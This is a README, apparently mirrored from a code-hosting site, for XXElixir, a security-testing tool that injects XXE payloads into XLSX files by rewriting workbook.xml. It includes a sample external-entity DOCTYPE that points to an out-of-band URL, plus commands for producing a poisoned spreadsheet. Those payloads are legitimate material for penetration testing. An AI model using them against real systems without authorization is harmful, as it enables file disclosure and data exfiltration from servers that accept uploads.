XXElixir Save
This tool is designed to test for file upload and XXE vulnerabilities by poisoning XLSX files.
Project README
XXElixir 🧪
This tool is designed to test for file upload and XXE (XML External Entity) vulnerabilities by poisoning an XLSX file. It allows the user to inject custom XML content or specify an out-of-band URL to retrieve data from an external entity. The tool works by unzipping the input XLSX file, modifying the workbook.xml file to include the user-specified XML content or URL, and then zipping the modified directory back into a new XLSX file. The resulting file can be used to test for file upload and XXE vulnerabilities in web applications that accept XLSX files.
Usage 🛠
Poison .XLSX file ☣️
python3 --file test.xlsx --xxe "<\!DOCTYPE ShiftSecurityConsulting [ <\!ENTITY xxe SYSTEM 'http://out-of-band.url'> ]>" --output poisoned.xlsx
python3 --file test.xlsx --url https://shiftsecurityconsulting.com --output poisoned.xlsx
Running from Docker 🐳
Build
docker build -t xxelixir .
Run
docker run -v $(pwd)/data:/data -ti xxelixir -f data/test.xlsx -u https://shiftsecurityconsulting.com -o /data/poisoned.xlsx
Parameters 🧰
| Parameter | Description | Type |
|---|---|---|
| --url / -u | The URL for out of band testing | String |
| --file / -f | Input XLSX file | File |
| --output / -o | Output file | File |
| --xxe | Custom XXE injection string | String |
Contact Me 📇
Educational purposes only and cannot be used for law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials of this project.
Open Source Agenda is not affiliated with "XXElixir" Project. README Source: kljunowsky/XXElixir
Stars
63
Open Issues
0
Last Commit
4 months ago
Repository
Open Source Agenda Badge
